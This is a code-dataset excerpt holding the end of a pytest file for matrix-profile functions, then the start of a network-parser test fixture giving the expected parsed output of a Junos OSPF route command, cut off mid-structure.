r = stomp(a,4)
assert(r[0] == mp_outcome).all()
def test_stomp_self_mpi(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mpi_outcome = np.array([4., 5., 6., 7., 0., 1., 2., 3., 0.])
r = stomp(a,4)
assert(r[1] == mpi_outcome).all()
def test_stamp_sampling_over_one(self):
with pytest.raises(ValueError) as excinfo:
stamp(None,None,sampling=2)
assert 'Sampling value must be a percentage' in str(excinfo.value)
def test_stamp_sampling_under_zero(self):
with pytest.raises(ValueError) as excinfo:
stamp(None,None,sampling=-1)
assert 'Sampling value must be a percentage' in str(excinfo.value)
def test_stamp_random_state_same_results_self_join(self):
random_state = 99
sampling = 0.30
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
r = stamp(a,4,None,sampling=sampling,random_state=random_state)
r2 = stamp(a,4,None,sampling=sampling,random_state=random_state)
all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
assert(all_same == True)
def test_stamp_random_state_same_results_dual_join(self):
random_state = 99
sampling = 0.30
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.2,0.0,1.0,1.0,0.3,0.0,1.0,1.0,0.0])
r = stamp(a,4,b,sampling=sampling,random_state=random_state)
r2 = stamp(a,4,b,sampling=sampling,random_state=random_state)
all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
assert(all_same == True)
def test_stamp_with_parallel_version_random_state_set_self_join(self):
random_state = 99
sampling = 0.1
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
r = stamp(a,4,None,sampling=sampling,random_state=random_state)
r2 = stamp(a,4,None,sampling=sampling,random_state=random_state)
all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
assert(all_same == True)
def test_stamp_with_parallel_version_random_state_set_dual_join(self):
random_state = 99
sampling = 0.1
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,2.0,0.0,1.1,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
r = stamp(a,4,b,sampling=sampling,random_state=random_state)
r2 = stamp(a,4,b,sampling=sampling,random_state=random_state)
all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
assert(all_same == True) | 33.269767 | 108 | 0.521599 | 1,596 | 7,153 | 2.246241 | 0.055764 | 0.206974 | 0.209205 | 0.179637 | 0.904881 | 0.89735 | 0.894003 | 0.876987 | 0.872524 | 0.853278 | 0 | 0.173109 | 0.236824 | 7,153 | 215 | 109 | 33.269767 | 0.483605 | 0.01384 | 0 | 0.746269 | 0 | 0 | 0.009923 | 0 | 0 | 0 | 0 | 0 | 0.164179 | 1 | 0.164179 | false | 0 | 0.022388 | 0 | 0.19403 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
81b22d29e34fbf54311e9348a9b56b1fdf20d5e0 | 59,091 | py | Python | src/genie/libs/parser/junos/tests/ShowOspfRouteBrief/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/junos/tests/ShowOspfRouteBrief/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/junos/tests/ShowOspfRouteBrief/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"ospf-route-information": {
"ospf-topology-route-table": {
"ospf-route": [
{
"ospf-route-entry": [
{
"address-prefix": "10.36.3.3",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.100.5.5",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.239",
"interface-cost": "1000",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.250",
"interface-cost": "200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.251",
"interface-cost": "205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.241",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.240",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.241",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.253",
"interface-cost": "5",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.119",
"interface-cost": "10100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.120",
"interface-cost": "10100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "0.0.0.0/0",
"interface-cost": "101",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Ext1",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.1.0.0/24",
"interface-cost": "20",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Ext2",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.36.3.3/32",
"interface-cost": "1202",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.16.0.0/30",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.100.5.5/32",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.100.5.5/32",
"interface-cost": "1201",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.24/30",
"interface-cost": "1000",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/2.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.28/30",
"interface-cost": "1005",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.239/32",
"interface-cost": "1001",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.19.198.239/32",
"interface-cost": "1001",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.174.132.237/32",
"interface-cost": "150",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Ext1",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.200/30",
"interface-cost": "205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.250/32",
"interface-cost": "200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.34.2.250/32",
"interface-cost": "200",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.251/32",
"interface-cost": "205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.34.2.251/32",
"interface-cost": "205",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.15.0.0/30",
"interface-cost": "1001",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.64.0.0/30",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.55.0.0/24",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/3.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.212/30",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.216/30",
"interface-cost": "1205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.241/32",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.169.196.241/32",
"interface-cost": "1201",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.16/30",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.32/30",
"interface-cost": "225",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.120/30",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/1.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.128/30",
"interface-cost": "125",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.156/30",
"interface-cost": "200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.240/32",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.169.14.240/32",
"interface-cost": "100",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.241/32",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.169.14.241/32",
"interface-cost": "105",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.242/32",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.243/32",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.92/30",
"interface-cost": "5",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/0.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.252/32",
"interface-cost": "0",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "lo0.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.189.5.252/32",
"interface-cost": "0",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "lo0.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.253/32",
"interface-cost": "5",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.189.5.253/32",
"interface-cost": "5",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.220.0/30",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.119/32",
"interface-cost": "10101",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.120/32",
"interface-cost": "10101",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2567",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2567 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2568",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "2568 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167966",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167966 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167967",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "167967 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28985",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28985 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28986",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "28986 (S=0)",
"interface-cost": "0",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "17000",
"interface-cost": "1201",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16051",
"interface-cost": "100",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16051 (S=0)",
"interface-cost": "100",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16052",
"interface-cost": "105",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16061",
"interface-cost": "200",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16062",
"interface-cost": "205",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16063",
"interface-cost": "1201",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16072",
"interface-cost": "5",
"next-hop-type": "Mpls",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16073",
"interface-cost": "1001",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "16073 (S=0)",
"interface-cost": "1001",
"next-hop-type": "Mpls",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup MPLS",
},
"ospf-next-hop": {
